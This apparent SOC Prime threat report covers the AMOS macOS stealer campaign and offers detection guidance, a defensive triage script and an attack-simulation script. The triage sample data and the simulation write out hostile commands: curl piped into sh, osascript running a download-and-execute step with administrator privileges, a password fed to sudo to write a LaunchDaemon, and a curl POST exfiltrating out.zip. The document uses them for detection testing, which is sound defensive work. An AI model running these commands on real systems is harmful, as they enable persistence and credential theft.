SOC Prime Bias: Medium

08 May 2026 18:45

AMOS Stealer Targets macOS Through “Cracked” Apps

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report describes a campaign distributing Atomic macOS Stealer (AMOS) by disguising it as cracked applications or by instructing users to paste a terminal command that fetches and runs the installer. Once executed, the malware collects a broad set of sensitive data, including credentials, browser data, cryptocurrency wallets, messaging application files, VPN profiles, and personal documents, then exfiltrates the stolen content over HTTP or HTTPS. To stay ahead of domain and URL blocklists, the operators rotate their delivery and exfiltration infrastructure throughout the campaign. The activity is aimed at macOS users, particularly those seeking unofficial or pirated software.

Investigation

Trend Vision One telemetry was used to reconstruct the full infection chain, beginning with downloads of cracked applications from haxmac.cc, followed by redirection through intermediary domains, execution of malicious shell scripts, creation of launch daemons for persistence, staging of data in /tmp, compression into ZIP archives, and exfiltration to rotating attacker-controlled domains. Researchers captured the relevant command lines, file paths, and behavioral indicators associated with each stage of the compromise.

Mitigation

Organizations should educate users about the risks of cracked software and copy-paste terminal commands, enforce Gatekeeper and notarization controls, and limit unnecessary script execution on macOS systems. Note that Gatekeeper and notarization only cover the trojanized-installer path: in the copy-and-paste variant the user runs curl and the downloaded script directly from Terminal, so that path has to be caught by behavioral monitoring. Defenders should therefore monitor for suspicious curl and osascript activity (curl piped into a shell, osascript running "do shell script" with administrator privileges, a password fed to sudo on stdin) and block access to known malicious domains and IP addresses. Endpoint detections should focus on unauthorized launch daemon creation, hidden file placement under /tmp or the user's home directory, and unusual file collection, archiving, or upload behavior.

Response

If AMOS activity is detected, isolate the affected endpoint, terminate the malicious processes, remove the hidden files and persistence artifacts (such as .helper, .agent, and com.finder.helper.plist; unload the daemon with launchctl before deleting the plist), and delete any staged data prepared for exfiltration. Treat every credential the stealer can reach as compromised: revoke browser-saved passwords, session cookies, Keychain items, and wallet keys, and perform forensic analysis on any recovered archives to scope what was actually taken. The identified malicious infrastructure should be blocked, and detection content should be updated to monitor for the observed command patterns.
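As an added example (not SOC Prime detection content and not the Trend Vision One telemetry the report is based on), the POSIX shell script below turns the monitoring points from the Mitigation section and the persistence artifacts from the Response section into a small offline triage. It classifies process command lines for the osascript, curl, sudo, LaunchDaemon, dot-file, zip, and upload patterns, and it checks a LaunchDaemon plist for a program path that a root daemon should never execute (a dot-file, anything under /tmp, or anything under /Users). The telemetry format ("<event-id> <command line>", one event per line), the event lines, the plist, and the 203.0.113.7 address are all constructed for this example; map the command-line field to whatever your EDR exports.

```shell
#!/bin/sh
# Added example, not SOC Prime detection content. Everything below the
# functions (the event lines, the plist, the 203.0.113.7 address) is
# constructed sample input for the example.

# Dot-file directly under /tmp or a user's home (e.g. /tmp/.helper, ~/.agent)
HIDDEN_PATH_RE='(/tmp|/private/tmp|/Users/[^/[:space:]]+)/\.[A-Za-z0-9_-]+'

# match <string> <ERE>: true if the string matches the regex
match() { printf '%s' "$1" | grep -Eq "$2"; }

# Classify one process command line. Prints the matched behaviours as a
# comma-separated list (in a fixed order), or "clean" when nothing matched.
classify_cmdline() {
    cmd=$1
    hits=""
    # osascript executing a shell command, with or without the admin prompt
    match "$cmd" 'osascript.*do shell script' && hits="${hits}osascript_shell,"
    match "$cmd" 'with administrator privileges' && hits="${hits}admin_prompt,"
    # curl piped into a shell, or curl -o followed by chmod/sh on the same line
    if match "$cmd" 'curl[^|]*[|][[:space:]]*(/bin/)?(ba|z)?sh([[:space:]]|$)' \
       || match "$cmd" 'curl .*-o .*(&&|;).*(chmod \+x|(ba)?sh )'; then
        hits="${hits}curl_exec,"
    fi
    # a captured password fed to sudo on stdin (T1548.003 in the attack flow)
    match "$cmd" '[|][[:space:]]*sudo[[:space:]]+-S' && hits="${hits}sudo_stdin,"
    # anything that writes or loads a plist under /Library/LaunchDaemons
    match "$cmd" '(tee|cp|mv|>|plutil|launchctl)[^;|]*/Library/LaunchDaemons/' \
        && hits="${hits}launchdaemon_write,"
    match "$cmd" "$HIDDEN_PATH_RE" && hits="${hits}hidden_path,"
    # staging archive creation and HTTP upload of data
    match "$cmd" '(^|[[:space:]/])zip[[:space:]].*\.zip' && hits="${hits}zip_staging,"
    match "$cmd" 'curl .*(-X[[:space:]]+POST|-F[[:space:]]|--data-binary|-T[[:space:]]|--upload-file|-d[[:space:]])' \
        && hits="${hits}exfil_post,"
    [ -n "$hits" ] && printf '%s\n' "${hits%,}" || printf 'clean\n'
}

# Read "<event-id> <command line>" lines on stdin, print "<event-id> <hits>"
scan_log() {
    while IFS= read -r line; do
        printf '%s %s\n' "${line%% *}" "$(classify_cmdline "${line#* }")"
    done
}

# A LaunchDaemon runs as root at boot: flag any <string> value in the plist
# that points at a dot-file, /tmp, or a user-writable location under /Users.
check_launchdaemon_plist() {
    sed -n 's/.*<string>\(.*\)<\/string>.*/\1/p' "$1" \
    | while IFS= read -r value; do
        if match "$value" "$HIDDEN_PATH_RE|^/(private/)?tmp/|^/Users/"; then
            printf 'suspicious:%s\n' "$value"
        fi
      done
}

# Constructed process telemetry (203.0.113.7 is a documentation address)
sample_log() {
    cat <<'EOF'
ev1 osascript -e 'do shell script "curl -s -o /tmp/.helper https://203.0.113.7/install.sh && chmod +x /tmp/.helper && /tmp/.helper" with administrator privileges'
ev2 /bin/sh -c "echo 'hunter2' | sudo -S tee /Library/LaunchDaemons/com.finder.helper.plist"
ev3 curl -fsSL https://203.0.113.7/x.sh | sh
ev4 zip -r /tmp/out.zip /tmp/.staging
ev5 curl -s https://api.github.com/repos/curl/curl/releases/latest -o /tmp/release.json
ev6 osascript -e 'display notification "Build finished"'
ev7 curl -s -X POST -F file=@/tmp/out.zip https://203.0.113.7/upload
EOF
}

# Constructed LaunchDaemon plist modelled on the com.finder.helper artifact
sample_plist() {
    cat <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>com.finder.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/sh</string>
    <string>/Users/alice/.agent</string>
  </array>
  <key>RunAtLoad</key>
  <true/>
</dict>
</plist>
EOF
}

# Demo: run the triage over the constructed telemetry and plist
sample_log | scan_log
demo_plist=$(mktemp)
sample_plist > "$demo_plist"
check_launchdaemon_plist "$demo_plist"
rm -f "$demo_plist"
```

Run it with `sh triage.sh`; ev1 through ev4 and ev7 are flagged with the behaviours from the attack flow, while the ordinary curl download (ev5) and the harmless osascript notification (ev6) come back clean. The regexes are deliberately loose: developer one-liners that pipe curl into a shell will also match, so baseline those before alerting on curl_exec alone and rely on the combination of hits (osascript_shell plus admin_prompt plus hidden_path in one command line) for high-confidence detection.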

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef tool fill:#cccccc
    classDef file fill:#ffcc99
    classDef process fill:#ff9966
    classDef data fill:#ccffcc

    %% Nodes – Actions (Techniques)
    step1_initial_access_file["<b>Action</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim downloads and runs a trojanized .dmg disguised as a cracked application."]
    class step1_initial_access_file action
    step2_copy_paste["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Victim copies a curl command from a webpage into Terminal, which downloads and runs install.sh."]
    class step2_copy_paste action
    step3_masquerading["<b>Action</b> – <b>T1036 Masquerading</b><br/>Malware presented as legitimate cracked software and fake installer pages."]
    class step3_masquerading action
    step4_curl_proxy["<b>Action</b> – <b>T1218 System Binary Proxy Execution</b><br/>The legitimate curl binary fetches malicious scripts."]
    class step4_curl_proxy action
    step5_osascript_proxy["<b>Action</b> – <b>T1216 System Script Proxy Execution</b><br/>osascript runs an AppleScript payload to execute code."]
    class step5_osascript_proxy action
    step6_shell_interpreter["<b>Action</b> – <b>T1059.004 Command and Scripting Interpreter: Unix Shell</b><br/>Shell commands create directories, collect files, and invoke curl for exfiltration."]
    class step6_shell_interpreter action
    step7_sudo_abuse["<b>Action</b> – <b>T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching</b><br/>Captured password supplied to sudo to write a LaunchDaemon plist with root privileges."]
    class step7_sudo_abuse action
    step8_persistence["<b>Action</b> – <b>T1543.004 Create or Modify System Process: Launch Daemon</b><br/>LaunchDaemon (com.finder.helper.plist) runs the malicious .agent script at system boot."]
    class step8_persistence action
    step9_defense_evasion["<b>Action</b> – <b>T1127 Trusted Developer Utilities Proxy Execution</b><br/>Apple developer utilities (osascript) are used to execute the payload, evading defenses."]
    class step9_defense_evasion action
    step10_dga["<b>Action</b> – <b>T1568.002 Dynamic Resolution: Domain Generation Algorithms</b><br/>Attacker rotates numerous .cfd and other domains for payload delivery."]
    class step10_dga action
    step11_browser_creds["<b>Action</b> – <b>T1555.003 Credentials from Password Stores: Credentials from Web Browsers</b><br/>Extraction of Chrome, Firefox, Edge login data and cookies."]
    class step11_browser_creds action
    step12_keychain["<b>Action</b> – <b>T1555.001 Credentials from Password Stores: Keychain</b><br/>Extraction of macOS Keychain items."]
    class step12_keychain action
    step13_wallet_keys["<b>Action</b> – <b>T1552.004 Unsecured Credentials: Private Keys</b><br/>Theft of cryptocurrency wallet files."]
    class step13_wallet_keys action
    step14_session_cookies["<b>Action</b> – <b>T1550.004 Use Alternate Authentication Material: Web Session Cookie</b><br/>Collection of session cookies for later reuse."]
    class step14_session_cookies action
    step15_archive["<b>Action</b> – <b>T1560 Archive Collected Data</b><br/>Gathered files are compressed into out.zip."]
    class step15_archive action
    step16_compression["<b>Action</b> – <b>T1027.015 Obfuscated Files or Information: Compression</b><br/>Data is compressed before exfiltration (obfuscation)."]
    class step16_compression action
    step17_exfil_https["<b>Action</b> – <b>T1071.001 Application Layer Protocol: Web Protocols</b><br/>Compressed archive uploaded via HTTPS POST to attacker-controlled server."]
    class step17_exfil_https action
    step18_indirect_curl["<b>Action</b> – <b>T1202 Indirect Command Execution</b><br/>curl command retrieves and runs a remote script silently."]
    class step18_indirect_curl action

    %% Nodes – Tools
    tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Command-line utility for transferring data with URLs."]
    class tool_curl tool
    tool_osascript["<b>Tool</b> – <b>Name</b>: osascript<br/><b>Description</b>: Executes AppleScript or JavaScript for Automation scripts."]
    class tool_osascript tool
    tool_sudo["<b>Tool</b> – <b>Name</b>: sudo<br/><b>Description</b>: Executes commands with elevated privileges."]
    class tool_sudo tool
    tool_launchd["<b>Tool</b> – <b>Name</b>: launchd<br/><b>Description</b>: macOS service manager for loading LaunchDaemons and agents."]
    class tool_launchd tool

    %% Nodes – Files and Data
    file_dmg["<b>File</b> – <b>Name</b>: trojanized.dmg<br/><b>Type</b>: Disk image disguised as cracked app"]
    class file_dmg file
    file_install_sh["<b>File</b> – <b>Name</b>: install.sh<br/><b>Type</b>: Shell script downloaded via curl"]
    class file_install_sh file
    data_out_zip["<b>Data</b> – <b>Name</b>: out.zip<br/><b>Content</b>: Collected files ready for exfiltration"]
    class data_out_zip data

    %% Flow Connections
    step1_initial_access_file -->|downloads & runs| file_dmg
    file_dmg -->|triggers| step1_initial_access_file
    step1_initial_access_file -->|leads to| step2_copy_paste
    step2_copy_paste -->|uses| tool_curl
    tool_curl -->|downloads| file_install_sh
    file_install_sh -->|executes| step2_copy_paste
    step2_copy_paste -->|leads to| step3_masquerading
    step3_masquerading -->|enables| step4_curl_proxy
    step4_curl_proxy -->|uses| tool_curl
    tool_curl -->|fetches| step5_osascript_proxy
    step5_osascript_proxy -->|uses| tool_osascript
    tool_osascript -->|executes| step6_shell_interpreter
    step6_shell_interpreter -->|invokes| step7_sudo_abuse
    step7_sudo_abuse -->|uses| tool_sudo
    tool_sudo -->|writes| step8_persistence
    step8_persistence -->|managed by| tool_launchd
    tool_launchd -->|runs| step9_defense_evasion
    step9_defense_evasion -->|facilitates| step10_dga
    step10_dga -->|provides| step11_browser_creds
    step10_dga -->|provides| step12_keychain
    step10_dga -->|provides| step13_wallet_keys
    step10_dga -->|provides| step14_session_cookies
    step11_browser_creds -->|collected into| step15_archive
    step12_keychain -->|collected into| step15_archive
    step13_wallet_keys -->|collected into| step15_archive
    step14_session_cookies -->|collected into| step15_archive
    step15_archive -->|produces| data_out_zip
    data_out_zip -->|compressed by| step16_compression
    step16_compression -->|sent via| step17_exfil_https
    step17_exfil_https -->|uses| tool_curl
    tool_curl -->|performs| step18_indirect_curl
    step18_indirect_curl -->|completes| step1_initial_access_file

    %% Styling
    class step1_initial_access_file,step2_copy_paste,step3_masquerading,step4_curl_proxy,step5_osascript_proxy,step6_shell_interpreter,step7_sudo_abuse,step8_persistence,step9_defense_evasion,step10_dga,step11_browser_creds,step12_keychain,step13_wallet_keys,step14_session_cookies,step15_archive,step16_compression,step17_exfil_https,step18_indirect_curl action
    class tool_curl,tool_osascript,tool_sudo,tool_launchd tool
    class file_dmg,file_install_sh file
    class data_out_zip data

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:
    A phishing lure delivers a short AppleScript payload to the victim. The script uses osascript to execute a shell command (sh -c) that invokes curl to download the AMOS payload from a malicious server, stages it under /tmp (the staging location observed in the campaign), and then executes it with elevated privileges obtained through the AppleScript "with administrator privileges" password prompt. Because osascript is a signed Apple binary, the activity looks like legitimate automation, while curl provides the network download.

  • Regression Test Script:

    # amos_stealer_simulation.sh
    # Simulate the AMOS osascript + curl execution chain on macOS.
    # Run only on an isolated test host. The URL is a harmless placeholder:
    # example.com serves no script, so curl -f fails and the chain stops after
    # the osascript and curl telemetry has been generated.

    # 1. Define the payload URL (placeholder; point it at your own test server
    #    to exercise the chmod/execute steps as well)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"

    # 2. Shell command the AppleScript will run: download, mark executable, execute
    PAYLOAD_CMD="curl -fsS -o /tmp/payload.sh $MALICIOUS_URL && chmod +x /tmp/payload.sh && /tmp/payload.sh"

    # 3. AppleScript that runs the command via sh -c and asks for admin rights.
    #    The shell command sits in single quotes inside the AppleScript string,
    #    so no nested double quotes are needed (the original nesting broke the
    #    AppleScript string literal).
    APPLESCRIPT="do shell script \"sh -c '$PAYLOAD_CMD'\" with administrator privileges"

    # 4. Execute the AppleScript via osascript (macOS shows a password prompt,
    #    which produces the "with administrator privileges" telemetry)
    osascript -e "$APPLESCRIPT"

    # 5. Pause briefly to allow the payload to run
    sleep 5
  • Cleanup Commands:

    # cleanup_amos_simulation.sh
    # Remove artifacts created by the simulation
    
    # Remove the downloaded payload
    rm -f /tmp/payload.sh
    
    # Kill the payload if it is still running
    pkill -f "/tmp/payload.sh" || true
    
    # Optionally, clear the AppleScript execution history
    # (macOS does not retain a persistent history for osascript)
    echo "Cleanup complete."